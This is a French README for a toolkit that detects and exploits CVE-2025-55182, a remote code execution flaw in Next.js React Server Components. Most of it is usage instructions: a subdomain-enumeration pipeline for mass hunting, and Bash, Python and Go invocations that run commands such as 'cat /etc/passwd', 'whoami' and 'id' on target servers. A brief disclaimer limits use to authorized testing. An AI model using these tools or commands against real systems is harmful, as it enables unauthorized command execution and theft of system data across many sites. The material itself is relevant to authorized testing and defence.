
Scanner RCE haute fidélité pour CVE-2025-55182 affectant Next.js RSC. Prend en charge le scan de masse, l'exécution de commandes et les pipelines de reconnaissance automatisés. Conçu pour les pentesters, les chercheurs et les chasseurs de primes.
Une boîte à outils complète pour détecter et exploiter CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance (RCE) dans les applications Next.js utilisant React Server Components.
Ce dépôt propose un scanner Bash unifié (mode cible unique et mode masse), des implémentations Python/Go, ainsi qu'un workflow de reconnaissance pour le bug bounty.

Pour la chasse de masse sur les domaines wildcard, utilisez ce pipeline pour filtrer les cibles avant le scan :
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
Le script scanner.sh prend en charge les scans de cible unique et les scans de masse à partir d'une liste de fichiers.
chmod +x scanner.sh
Idéal pour vérifier une cible spécifique avec une sortie détaillée.
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Scanne efficacement une liste d'URL et enregistre les hôtes vulnérables dans un fichier.
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
Utilisez cette version si vous rencontrez des problèmes avec l'échappement des caractères spéciaux dans Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Haute performance, dépendances minimales.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Cet outil est destiné uniquement à des fins éducatives et à des tests de sécurité autorisés. Toute utilisation non autorisée est strictement illégale. Le développeur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce programme.
Détail CVE NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Avis de sécurité React (vulnérabilité React Server Components) : https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Modèle Nuclei ProjectDiscovery : https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Description |
|---|
-d, --domain | URL de la cible unique |
-l, --list | Fichier contenant la liste des URL |
-c, --command | Commande à exécuter (par défaut : id) |
-o, --output | Fichier de sortie pour les hôtes vulnérables (par défaut : vulnerable_hosts.txt) |